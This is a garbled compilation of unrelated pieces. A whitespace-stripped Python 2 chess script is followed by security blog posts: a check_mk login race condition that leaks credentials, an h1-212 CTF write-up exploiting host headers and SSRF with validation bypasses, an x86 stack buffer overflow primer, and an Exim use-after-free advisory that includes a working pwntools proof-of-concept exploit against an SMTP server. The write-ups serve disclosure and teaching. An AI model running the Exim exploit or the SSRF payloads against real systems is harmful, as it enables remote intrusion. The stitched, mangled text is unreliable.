#/usr/bin/python2.7column_reference="a b c d e f g h".split(" ")EMPTY_SQUARE=" "row_letters="abcdefgh"king_moves=[]position=''dest=''solution=set([])classModel(object):def__init__(self):self.board=[]pawn_base="P "*8white_pieces="R N B Q K B N R"white_pawns=pawn_base.strip()black_pieces=white_pieces.lower()black_pawns=white_pawns.lower()self.board.append(black_pieces.split(" "))self.board.append(black_pawns.split(" "))foriinrange(4):self.board.append([EMPTY_SQUARE]*8)self.board.append(white_pawns.split(" "))self.board.append(white_pieces.split(" "))defmove(self,start,destination):forcin[start,destination]:ifc.i>7orc.j>7orc.i<0orc.j<0:returnifstart.i==destination.iandstart.j==destination.j:returnifself.board[start.i][start.j]==EMPTY_SQUARE:returnf=self.board[start.i][start.j]self.board[destination.i][destination.j]=fself.board[start.i][start.j]=EMPTY_SQUAREclassBoardLocation(object):def__init__(self,i,j):self.i=iself.j=jclassView(object):def__init__(self):passdefdisplay(self,board):print("%s: %s"%(" ",column_reference))print("-"*50)fori,rowinenumerate(board):row_marker=8-iprint("%s: %s"%(row_marker,row))classController(object):def__init__(self):self.model=Model()self.view=View()defrun(self):globalsolutionmove=positionstart,destination=self.parse_move(move)self.model.move(start,destination)start,destination=self.parse_move("a2-b2")self.model.move(start,destination)start,destination=self.parse_move("b2-c2")self.model.move(start,destination)start,destination=self.parse_move("c2-d2")self.model.move(start,destination)start,destination=self.parse_move("e2-f2")self.model.move(start,destination)start,destination=self.parse_move("f2-g2")self.model.move(start,destination)start,destination=self.parse_move("g2-h2")self.model.move(start,destination)start,destination=self.parse_move("h2-a1")self.model.move(start,destination)start,destination=self.parse_move("a1-b1")self.model.move(start,destination)start,destination=self.parse_move("b1-c1")self.model.move(start,destination)start,destination=self.parse_move("c1-d1")self.model.move(start,destination)start,destination=self.parse_move("e1-f1")self.model.move(start,destination)start,destination=self.parse_move("f1-g1")self.model.move(start,destination)start,destination=self.parse_move("g1-h1")self.model.move(start,destination)start,destination=self.parse_move("h1-a3")self.model.move(start,destination)start,destination=self.parse_move("a3-b3")self.model.move(start,destination)start,destination=self.parse_move("b3-c3")self.model.move(start,destination)start,destination=self.parse_move("c3-d3")self.model.move(start,destination)start,destination=self.parse_move("e3-f3")self.model.move(start,destination)start,destination=self.parse_move("f3-g3")self.model.move(start,destination)start,destination=self.parse_move("g3-h3")self.model.move(start,destination)start,destination=self.parse_move("h3-a4")self.model.move(start,destination)start,destination=self.parse_move("a4-b4")self.model.move(start,destination)start,destination=self.parse_move("b4-c4")self.model.move(start,destination)start,destination=self.parse_move("c4-d4")self.model.move(start,destination)start,destination=self.parse_move("e4-f4")self.model.move(start,destination)start,destination=self.parse_move("f4-g4")self.model.move(start,destination)start,destination=self.parse_move("g4-h4")self.model.move(start,destination)start,destination=self.parse_move("h4-a5")self.model.move(start,destination)start,destination=self.parse_move("a5-b5")self.model.move(start,destination)start,destination=self.parse_move("b5-c5")self.model.move(start,destination)start,destination=self.parse_move("c5-d5")self.model.move(start,destination)start,destination=self.parse_move("e5-f5")self.model.move(start,destination)start,destination=self.parse_move("f5-g5")self.model.move(start,destination)start,destination=self.parse_move("g5-h5")self.model.move(start,destination)start,destination=self.parse_move("h5-a6")self.model.move(start,destination)start,destination=self.parse_move("a6-b6")self.model.move(start,destination)start,destination=self.parse_move("b6-c6")self.model.move(start,destination)start,destination=self.parse_move("c6-d6")self.model.move(start,destination)start,destination=self.parse_move("e6-f6")self.model.move(start,destination)start,destination=self.parse_move("f6-g6")self.model.move(start,destination)start,destination=self.parse_move("g6-h6")self.model.move(start,destination)start,destination=self.parse_move("h6-a7")self.model.move(start,destination)start,destination=self.parse_move("a7-b7")self.model.move(start,destination)start,destination=self.parse_move("b7-c7")self.model.move(start,destination)start,destination=self.parse_move("c7-d7")self.model.move(start,destination)start,destination=self.parse_move("e7-f7")self.model.move(start,destination)start,destination=self.parse_move("f7-g7")self.model.move(start,destination)start,destination=self.parse_move("g7-h7")self.model.move(start,destination)fori,rowinenumerate(self.model.board):row_marker=8-iif'K'inrow:print"Move: "+position+"({1}{0})".format(row_marker,row_letters[row.index('K')])solution.add("{1}{0}".format(row_letters[row.index('K')],row_marker))# Print board if needed# self.view.display(self.model.board)defparse_move(self,move):s,d=move.split("-")i=8-int(s[-1])j=column_reference.index(s[0])start=BoardLocation(i,j)i=8-int(d[-1])j=column_reference.index(d[0])destination=BoardLocation(i,j)returnstart,destinationif__name__=="__main__":forjin'12345678':foriin'abcdefgh':king_moves.append('e1-'+i+j)dest=i+jposition='e1-'+i+jC=Controller()C.run()solution=sorted(solution)out=''forpositioninsolution:out=out+position[::-1]+";"printout
The authors of check_mk have fixed a quite interesting vulnerability, which I have recently reported to them, called CVE-2017-14955 (sorry no fancy name here) affecting the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It’s basically about a Race Condition vulnerability affecting the login functionality, which in the end leads to the disclosure of authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it ;-)
How to win a race
You might have seen this login interface before:
While trying to brute force the authentication of check_mk with multiple concurrent threads using the following request:
A really interesting “No such file or directory” is thrown randomly and completely unreliably, which looks like the following:
I guess you find this as interesting as I did, because this Python exception basically contains a copy of all added users including their email addresses, roles, and even their encrypted password.
Triaging
Sometimes I’m really curious about the root cause of some vulnerabilities just like in this specific case. What makes this vulnerability so interesting is the fact that the vulnerability can be triggered by just knowing one valid username, which is usually “omdadmin”.
So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):
This function basically stores the number of failed login attempts for a valid user and in the end calls another function named “save_users()” with the number of failed login attempts as an argument. When tracing further through the save_users(), you’ll finally come across the vulnerable code part (lines 575-582):
But the vulnerability doesn’t look quite obvious, right? Well it’s basically about a race condition - if you’re not familiar with Race Conditions, just imagine the following situation applied to that code snippet:
When brute-forcing, you usually use multiple, concurrent threads, because otherwise it would take too long.
All of these threads will go through the same instruction set, which means they will call the save_users() function at nearly the same time - depending a bit on the connection delay between the client and the server.
For simplicity let’s imagine, two of these threads are only a tenth of a millisecond away from each other, so “delayed” by just one instruction (in terms of the script shown above).
The first thread passes all instructions and thereby creates a new “users.mk.new” file (line 2), until it reaches the os.rename call (line 8), but has not yet processed the os.rename call.
The second thread, does the very same, but with the mentioned small delay: it passes all instructions including up to line 7, which means it has just closed the “users.mk.new” file and is now about to call the os.rename function as well.
Since the first thread is a bit ahead of time, it is the first to processes the os.rename function call and thereby renames the “users.mk.new” file to “users.mk”.
The second thread now tries to do the very same thing, however the “users.mk.new” file was just renamed by the first thread, which however means that “its own” os.rename call still tries to rename the “users.mk.new” file, which was apparently just renamed by the first thread.
Since there is no exception handling built around this instruction set, the Python script fails since the second thread cannot find the file to rename and finally throws the stack trace from above leaking all the credential details.
A few more things that come into play here:
First: the create_user_file() function doesn’t really play an important role here, since it’s sole purpose is to create a new File object. So if the file passed to it via its “path” argument does already exist in the file-system, it will not throw an exception at all.
Second: More interestingly, the application is shipped with an own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables including these very sensitive ones:
Third: There is also another vulnerable instruction set right before the first one at /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py - lines 567 to 573, with exactly the same issue:
About the Vendor Response
Just one word: amazing! I have reported this vulnerability on 2017-09-21, which was a Thursday, and they’ve already pushed a fix to their git on Tuesday 2017-09-25 and at the same time published a new version 1.2.8p26 which contains the official fix. Really commendable work check_mk team!
Exploit time!
An exploit script will be disclosed soon over at Exploit-DB, in the meanwhile, take it from here:
With the h1-212 CTF, HackerOne offered a really cool chance to win a visit to New York City to hack on some exclusive targets in a top secret location. To be honest, I’m not a CTF guy at all, but this incentive caught my attention. The only thing one had to do in order to participate was: solve the CTF challenge, document the hacky way into it and hope to get selected in the end. So I decided to participate and try to get onto the plane - unfortunately my write-up wasn’t selected in the end, however I still like to share it for learning purposes :-)
Thanks to Jobert and the HackerOne team for creating a fun challenge!
Introduction
The CTF was introduced by just a few lines of story:
An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!
While this sounds like a very self-confident engineer, there is one big hint in these few lines to actually get a first step into the door: acme.org.
The first visit to the given URL at http://104.236.20.43/, showed nothing more than the “default Apache” page:
Identify All the Hints!
While brute-forcing a default Apache2 installation doesn’t make much sense (except if you want to rediscover /icons ;-) ), it was immediately clear that a different approach is required to solve this challenge.
What has shown to be quite fruity in my bug bounty career is changing the host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” is actually located at “admin.acme.org” - so by changing the host header from “104.236.20.43” to “admin.acme.org”:
The Apache default page was suddenly gone and the web server returned a different response:
As you might have noticed already, there is one line in this response that looks ultimately suspicious: The web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.
Building a Bridge Into the Teapot
While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.
Since cookies are actually user-controllable, imagine what would happen if the “admin” cookie value is changed to “yes”?
Surprise, the web application responded differently with an HTTP 405 like the following:
This again means that the HTTP verb needs to be changed. However when changed to HTTP POST:
The web application again responded differently with an HTTP 406 this time:
While googling around for this unusual status code, I came across the following description by W3:
10.4.7 406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.
Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.
Jumping into the Teapot
So it seems to be about a missing Content-Type declaration here. After a “Content-Type” header of “application/json” was added to the request:
A third HTTP response code - HTTP 418 aka “the teapot” was returned:
Now it was pretty obvious that it’s about a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:
The application responded with the missing parameter name:
Given the parameter name, this somehow smelled a bit like a nifty Server-Side Request Forgery challenge.
Short Excursion to SSRF
What I usually do as some sort of precaution in such scenarios is having a separate domain like “rcesec.com”, whose authoritative NS servers point to an IP/server under my control in order to be able to spoof DNS requests of all kinds. So i.e. “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, which both point to the IP address of one of my servers:
On the nameserver side, I do like to use the really awesome tool called “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records like A, AAAA, MX, CNAME or NS to whatever value you like. I usually do point all A records to the loopback address 127.0.0.1 to discover some interesting data:
Breaking the Teapot
Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:
resulted in the following response:
Funny side note here: I accidentally bypassed another input filtering which required the subdomain part of the input to the domain parameter to include the string “212”, but I only noticed this by the end of the challenge :-D
So it seems that the application accepted the value and just responded with a reference to a new PHP file (Remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:
The application responded with a huge base64-encoded string:
What was even more interesting here, is that the listening dnschef actually received a remote DNS lookup request for “h1-212.rcesec.com” just as a consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:
While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in form of the base64-encoded string returned in the response body, which was (when decoded) the actual content of the web server listening on “localhost”:
The Wrong Direction
While I was at first somehow convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation probably? ;-) ), I first wanted to retrieve the contents of Apache’s server-status page (which is usually bound to the localhost) to potentially fetch the flag from there on. However when trying to query that page using the following request (remember “h1-212.rcesec.com” did actually resolve to “127.0.0.1”, which applied to all further requests):
The application just returned an error, indicating that there was at least a very basic validation of the domain name in place requiring the domain value to be ended with the string “.com”:
Bypassing the Domain Validation (Part 1)
OK, so the application expected the domain to end with a “.com”. While trying to bypass this on common ways using i.e. “?”:
The application always responded with:
The same applies to “&”, “#” and (double-) URL-encoded representations of it. However when a semicolon was used:
The application responded again with a reference to the read.php file:
Following that one, indeed returned a base64-encoded string of the server-status output:
While I was thinking “yeah I got it finally”, it turned out that there wasn’t a flag anywhere. Although I think it was also not intended to expose the Apache-Status page at all by the engineer ;-) :
The Right Direction
While I was poking around on the localhost to find the flag for a while without any luck, I decided to go a different way and use the discovered SSRF vulnerability in order to see whether there are any other open ports listening on localhost, which are otherwise not visible from the outside. To be clear: a port scan from the Internet on the target host did only reveal the open ports 22 and 80:
Since port 22 was known to be open, it could be easily verified by using the SSRF vulnerability to check whether the port can actually be reached via localhost as well:
This returned the following output (after querying the read.php file again):
Base64-decoded:
Et voila. Since scanning all ports manually and requesting everything using the read.php file was a bit inefficient, I’ve wrote a small Python script which is capable of scanning a range of given ports numbers (i.e. from 81 to 1338), fetching the “next” response and finally tries to base64-decode its value:
When run my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):
Bypassing the Domain Validation (Part 2)
So it seemed like the flag could be located somewhere on the service behind port 1337. However I noticed an interesting behaviour I haven’t thought about earlier: When a single slash after the port number was used:
The web application always returned an HTTP 404:
This is simply due to the fact that the semicolon was interpreted by the webserver as part of the path itself. So if “;.com” did not exist on the remote server, the web server did always return an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming that the flag file would be simply named “flag”, the following must be met in the end:
The domain had to end with “.com”
The URL-Splitting characters %, &, # and their (double-encoded) variants were not allowed
In the end the following request actually met all conditions:
Here I was using a unicode-based linefeed-character to split up the domain name into two parts. This actually triggered two separate requests, which could be observed by the number being added to the read.php file and its “id” parameter. So when a single request without the linefeed character was issued:
the application returned the ID “0”:
However when the linefeed payload was issued:
The read.php ID parameter was suddenly increased by two to “2” instead:
This indicated that the application actually accepted both “domains” leading to two different requests being sent. By querying the ID value minus 1 therefore returned the results from the call to “h1-212.rcesec.com:1337/flag”:
Et voila:
When the “data” value is base64-decoded, it finally revealed the flag:
I will try to write as much as possible, but this will not happen too often.
I will probably talk about my projects, NetRipper and Shellcode Compiler, reverse engineering or exploit development, but I will also try to cover web application security.
I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction in the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows.
Introduction
This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts.
The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is not DEP and ASLR, things that will be detailed later.
I would like to start with a short introduction on assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand how a “buffer overflow” vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows, here we will discuss only the easiest to understand one, stack based buffer overflow.
Introduction to ASM
In order to make sure all C/C++ developers will understand, I will explain first what happens with a C/C++ code when it is compiled. Let’s take the following code:
#include <stdio.h>
int main()
{
puts("RST rullz");
return 0;
}
The compiler will translate the code into assembly language, which will be translated later into machine code, that can be understood by the processor.
The ASM generated code will look similar to the following one:
We can see a series of bytes: 0x68 0xF4 0x20 0x03 0x00 0xFF 0x15 0xA0 0x20 0x03 0x00 0x83 0xC4 0x04 0x33 0xC0 0xC3. On the right, we can see the instructions that were assembled to those bytes. In order words, the processor will read the bytes and process them as assembly code.
The processor does not understand the C/C++ variables. It has its own “variables”, more specifically, each processor has its own registers where it can store data.
A few of those registers, are the following:
EAX, EBX, ECX, EDX, ESI, EDI – General purpose registers that store data.
EIP – Special register: the processor executes each instruction, one by one (such as ASM code). Let’s suppose the first instruction is available at the address 0x10000000. One instruction can have one or more bytes, let’s suppose it has 3 bytes. Initially, the value of this register is 0x10000000. When the processor will execute the instruction, the EIP value will be 0x10000003.
ESP – Stack pointer: We will detail this later. For the moment it is enough to mention that a special data region, called stack, will be used by the program, and this register holds the value of the address of the top of the stack. We also have EBP register, which holds the base of the current stack memory.
All these registers can store 4 bytes of memory. The “E” comes from “Extended” as the processors on 16 bits had only registers that could store 16 bits, such as AX, BX, CX, DX. On 64 bits, the registers can hold 64 bits: RAX, RBX etc.
A very important concept that needs to be understood when it comes to assembly language is the stack. The stack is a way to store data, piece by piece (4 bytes pieces of data) where each new added piece is placed on the top of the last one. When the data is removed from the stack, it is removed from the top to the bottom, piece by piece. Or, how a teacher from college used to tell us, the stack is similar to a stack of plates: you can add one only at the top, and you remove them one by one from the top to the bottom.
The stack is used at the processor level (on 32 bits) because:
local variables (inside functions) are placed on the stack
function parameters are also placed on the stack
There are also two things that we need to take care when we work with ASM:
the processors are little endian: more exactly, if you have a variable x = 0x11223344, this will be stored in memory such as 0x44332211.
when we add a new element (4 bytes piece of memory) on the stack, the value of the ESP will be ESP-4! This is important, as the “stack grows to 0”.
We have two ASM instructions that we can use to work with the stack:
PUSH – Will place a 4 bytes value on the stack
POP – Will remove a 4 bytes value from the stack
For example, we can have the following stack (left is the address, right is the value):
24 - 1111
28 - 2222
32 - 3333
The address on the left will be smaller when we will add new items on the stack. Let’s add two new elements:
PUSH 5555
PUSH 6666
The stack will look like this:
16 - 6666
20 - 5555
24 - 1111
28 - 2222
32 - 3333
The easiest way to understand this is to consider that ESP, the registers that holds the top of the stack, is to think about it as a “how much space has the stack left to add new elements”.
As we already discussed, PUSH and POP instructions work with the stack. The processor executes instructions in order to do its job and each instruction has its own role. Let’s see some other instructions:
MOV – Stores data to a register
ADD – Does an addition
SUB – Does a substraction
CALL – Calls a function
RETN – Returns from a function
JMP – Jumps to an address
XOR – Binary operations, for example XOR EAX, EAX is the equivalent of EAX=0
INC – Increments the value by 1 (x++)
DEC – Decrements the value by 1 (x–)
There are a lot of other instructions, but these are the most common and easy to understand. Let’s see a few examples:
ADD EAX, 5 ; Adds the value 5 to the EAX register. It is EAX = EAX + 5
SUB EDX, 7 ; Substracts 7 from the value of EDX register. Such as EDX = EDX - 7
CALL puts ; Calls the "puts" function
RETN ; Returns from the function
JMP 0x11223344 ; Jumps to the specified address and execute the instructions from there
XOR EBX, EBX ; The equivalent of EBX = 0
MOV ECX, 3 ; The equivalent of ECX = 3
INC ECX ; The equivalent of ECX++
DEC ECX ; The equivalent of ECX--
It should be pretty easy to understand. Now we can also understand what the processor does to print our message.
PUSH OFFSET SimpleEX.@_rst_@ – I replaced the longer string with something simple. It is actually a pointer to the memory location where the “RST rullz” message is placed in memory. The instruction adds on the stack the addres of our string. As a result, the value of the ESP register will be ESP – 4.
CALL DWORD PTR DS:[<&MSVCR100.puts>] – Calls the “puts” function from the “MSVCR100” (Microsoft Visual C Runtime v10) library, used by Visual Studio 2010. We will detail later how this instruction works, but before we call a function, we have to add the parameters on the stack (first instruction).
ADD ESP, 4 – Since the first instruction will substract 4 bytes from the ESP register value, by doing this we retore those 4 bytes.
XOR EAX, EAX – This means EAX = 0. The value returned by a function will be stored in the EAX register (we have return 0 at the end of the code).
RETN – As we specified the return value with the previous instruction, we can safely return from the “main” function.
In order to understand better how function call works, let’s take the following example:
#include <stdio.h>
int functie(int a, int b)
{
return a + b;
}
int main()
{
functie(5, 6);
return 0;
}
The “main” function will look in ASM code like this:
Note: Visual Studio is smart enough to automatically have the result of the addition (5 + 6 = 11). For tests, you can completely deactivate the compiler optimizations from Properties > C++ > Optimization.
We can see some common instructions for both functions:
PUSH EBP – At the beginning of the functions
MOV EBP, ESP – At the beginning of the functions
POP EBP – At the end of the functions
Well, these instructions have the role to create “stack frames”. They have the role to separate the function calls on the stack, so the EBP and ESP registers (the base and the top of the stack) will contain the stack memory area that is used by the currently called function . With other words, using these instructions, the EBP register will hold the address where the data (local variables) used by the current function begins and the ESP register will holds the address where the data used by the current function ends.
Let’s start with the function that does the addition.
MOV EAX,DWORD PTR SS:[EBP+8]
ADD EAX,DWORD PTR SS:[EBP+C]
Don’t be scared about the “DWORD PTR SS:[EBP+8]” stuff. As we previously discussed between EBP and ESP we can find the data used by the function. In this case, this data represents the parameters of the function. The parameters are available on the stack and there are relative to the EBP address, at the EBP+8 and EBP+C (0xC == 12).
Also, in ASM, the square braces are used such as “*” in C/C++ when it comes to pointers. As *p means “the value at the address p”, [EBP] means “the value at the address of the EBP register”. It is required to do this because the EBP register contains an address of memory as a value and we need the value that is stored at that memory location.
Other thing to notice is that the “DWORD” specifies that at the specified address there is a 4 bytes value. There are a few types of data that specify the size of the data:
BYTE – 1 byte
WORD – 2 bytes
DWORD – 4 bytes (Double WORD)
The SS (Stack Segment), DS (Data Segment) or CS (Code segment) are other registers that identify different memory regions/segments: stack, data or code, and each of those locations has its own access rights: read, write or execute.
So what those two instructions do? First instruction will place the value of the parameter “a”, the first parameter, in the EAX register. The second instruction will add the value of the second parameter “b”, to the EAX register. So, in the end, the EAX register will contain the “a+b” value and this value will be returned by the function on RETN.
Let’s go now to the function that calls the addition function.
PUSH 6
PUSH 5
CALL SimpleEX.functie
ADD ESP,8
We remember that the function call is “functie(5, 6)”. Well, in order to call a function, we have to do the following:
Put the parameters on the stack, from right to left, so first 6, second 5
Call the function
Clear the space allocated for the parameters (4 bytes * 2 parameters)
So, we place the two parameters on the stack (32 bits or 4 bytes each parameter): first we add 6 to the stack, followed by 5, we call the function and clean the stack. In order to clean the stack, we just add 8 to the ESP value (the two parameters size) in order to restore it to the value before the function call. We previously discussed that it is possible to use POP instruction to remove data from the stack, but in this case, there would be two POP instructions. If we would call a function with 100 parameters, we would have to do 100 POP instructions, and we can do it easier and faster with a single “ADD ESP” instruction.
Note: It is important, but not for the purpose of this article: there are multiple ways to call a function, knwon as “calling conventions”. This method, which requires to place the parameters from the right to the left and clean the stack after the function call is called “cdecl”. Other functions, such as the functions from the Windows operating system, called Windows API (Application Programming Interface) use a different calling convention called “stdcall”, which also requires to place the function parameters on the stack from right to the left, but the cleaning of the stack is done inside the function that is called, not after the “CALL” instruction.
It is also important to understand that when we call a function using the “CALL” instruction, the address of the instruction following the “CALL” instruction is placed on the stack. For example:
On the left we can see the memory addresses where the instructions are stored. The PUSH instructions have each 2 bytes. The CALL instruction, available at the address 0x00261017 has 5 bytes. So, the address following this instruction in 0x0026101C (which is 0x00261017 + 5). This is the address that will be pushed on the stack when the CALL instruction is executed.
Before the CALL instruction, the stack will look like this:
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After the exection of the CALL instruction, the stack will look like this (the address values are simple to be easier to understand):
20 - 0x0026101C ; The address of the instruction following the CALL instruction
; We need to save it in order to be able to know where to return after the function code is executed
; This is also code the "return address"
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After the return address is placed on the stack, the execution will continue with the function code. The first two instruction, called function “prologue”, are used to create the stack frame for the function called:
PUSH EBP
MOV EBP,ESP
After the PUSH instruction, the stack will look like this;
16 - 32 ; The value of EBP before the function call
20 - 0x0026101C ; The return address, where we will go back at the RETN instruction
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
After “MOV EBP, ESP” instruction, the EBP will have the value the top of the stack. It is important to note that if we would use local variables inside the function, they will be placed on the stack.
Let’s modify the function to this:
int functie(int a, int b)
{
int v1 = 3, v2 = 4;
return a + b;
}
We have now two local variables which are initialized with the values 3 and 4. The new code of the function will contain some new code:
SUB ESP,8 ; Allocate space on the stack for the two variables, 4 bytes each
MOV DWORD PTR SS:[EBP-4],3 ; Initialize the first variable
MOV DWORD PTR SS:[EBP-8],4 ; Initialize the second variable
The stack will contain now:
08 - 4 ; Second variable
12 - 3 ; First variable
16 - 32 ; The value of EBP before the function call
20 - 0x0026101C ; The return address
24 - 0x5
28 - 0x6
32 - 0x1337 ; Anything we have before the PUSH instructions
As a conclusion, it is important to remember the following:
local function variables are placed on the stack
the return address is also placed on the stack
If you have any question, before proceeding with the stack based buffer overflow, make sure you have the answers to your questions in order to properly understand the subject.
You can continue this article with the second part.
On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.
About Exim
Exim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a mail server survey by E-Soft Inc. shows over half of the mail servers identified are running exim.
Affected
Exim version 4.88 & 4.89 with chunking option enabled.
According to our survey, about 150k servers affected on 21st November, 2017 (data collected from scans.io).
Vulnerability Details
Through our research, the following vulnerabilies were discovered in Exim. Both vulnerabilies involve in BDAT command. BDAT is an extension in SMTP protocol, which is used to transfer large and binary data. A BDAT command is like BDAT 1024 or BDAT 1024 LAST. With the SIZE and LAST declared, mail servers do not need to scan for the end dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.
Use-after-free in receive_msg leads to RCE (CVE-2017-16943)
Incorrect BDAT data handling leads to DoS (CVE-2017-16944)
Use-after-free in receive_msg leads to RCE
Vulnerability Analysis
To explain this bug, we need to start with the memory management of exim. There is a series of functions starts with store_ such as store_get, store_release, store_reset. These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:
Initially, exim allocates a big storeblock (default 0x2000) and then cut it into stores when store_get is called, using global pointers to record the size of unused memory and where to cut in next allocation. Once the current_block is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes current_block point to it. Exim maintains three store_pool, that is, there are three chains like the illustration above and every global variables are actually arrays.
This vulnerability is in receive_msg where exim reads headers:
receive.c: 1817 receive_msg
It seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend store, the function store_extend checks whether the old store is the latest store allocated in current_block. It returns False immediately if the check is failed.
store.c: 276 store_extend
Once store_extend fails, exim tries to get a new store and release the old one. After we look into store_get and store_release, we found that store_get returns a store, but store_release releases a block if the store is at the head of it. That is to say, if next->text points to the start the current_block and store_get cuts store inside it for newtext, then store_release(next->text) frees next->text, which is equal to current_block, and leaves newtext and current_block pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call store_get after next->text is allocated. This was impossible until BDAT command was introduced into exim. BDAT makes store_get reachable and finally leads to an RCE.
Exim uses function pointers to switch between different input sources, such as receive_getc, receive_getbuf. When receiving BDAT data, receive_getc is set to bdat_getc in order to check left chunking data size and to handle following command of BDAT. In receive_msg, exim also uses receive_getc. It loops to read data, and stores data into next->text, extends if insufficient.
receive.c: 1817 receive_msg
for(;;){intch=(receive_getc)(GETC_BUFFER_UNLIMITED);/* If we hit EOF on a SMTP connection, it's an error, since incoming
SMTP must have a correct "." terminator. */if(ch==EOF&&smtp_input/* && !smtp_batched_input */){smtp_reply=handle_lost_connection(US" (header)");smtp_yield=FALSE;gotoTIDYUP;/* Skip to end of function */}
In bdat_getc, once the SIZE is reached, it tries to read the next BDAT command and raises error message if the following command is incorrect.
smtp_in.c: 628 bdat_getc
caseBDAT_CMD:{intn;if(sscanf(CSsmtp_cmd_data,"%u %n",&chunking_datasize,&n)<1){(void)synprot_error(L_smtp_protocol_error,501,NULL,US"missing size for BDAT command");returnERR;}
In exim, it usually calls synprot_error to raise error message, which also logs at the same time.
smtp_in.c: 628 bdat_getc
staticintsynprot_error(inttype,intcode,uschar*data,uschar*errmess){intyield=-1;log_write(type,LOG_MAIN,"SMTP %s error in \"%s\" %s %s",(type==L_smtp_syntax_error)?"syntax":"protocol",string_printing(smtp_cmd_buffer),host_and_ident(TRUE),errmess);
The log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as '\n'->'\\n'. Therefore, it asks store_get for memory to store strings.
This store makes if (!store_extend(next->text, oldsize, header_size)) in receive_msg failed when next extension occurs and then triggers use-after-free.
Exploitation
The following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to 0xdeadbeef. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with default configuration is also exploitable, and we will discuss it at the end of this section.
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
frompwnimport*r=remote('127.0.0.1',25)r.recvline()r.sendline("EHLO test")r.recvuntil("250 HELP")r.sendline("MAIL FROM:<[email protected]>")r.recvline()r.sendline("RCPT TO:<[email protected]>")r.recvline()r.sendline('a'*0x1250+'\x7f')r.recvuntil('command')r.sendline('BDAT 1')r.sendline(':BDAT \x7f')s='a'*6+p64(0xdeadbeef)*(0x1e00/8)r.send(s+':\r\n')r.recvuntil('command')r.send('\n')r.interactive()
Running out of current_block
In order to achieve code execution, we need to make the next->text get the first store of a block. That is, running out of current_block and making store_get allocate a new block. Therefore, we send a long message 'a'*0x1250+'\x7f' with an unprintable character to cut current_block, making yield_length less than 0x100.
Starts BDAT data transfer
After that, we send BDAT command to start data transfer. At the beginning, next and next->text are allocated by store_get.
The function dkim_exim_verify_init is called sequentially and it also calls store_get. Notice that this function uses ANOTHER store_pool, so it allocates from heap without changing current_block which next->text also points to.
receive.c: 1734 receive_msg
Call store_getc inside bdat_getc
Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the current_block with store_get in string_printing.
Keep sending msg until extension and bug triggered
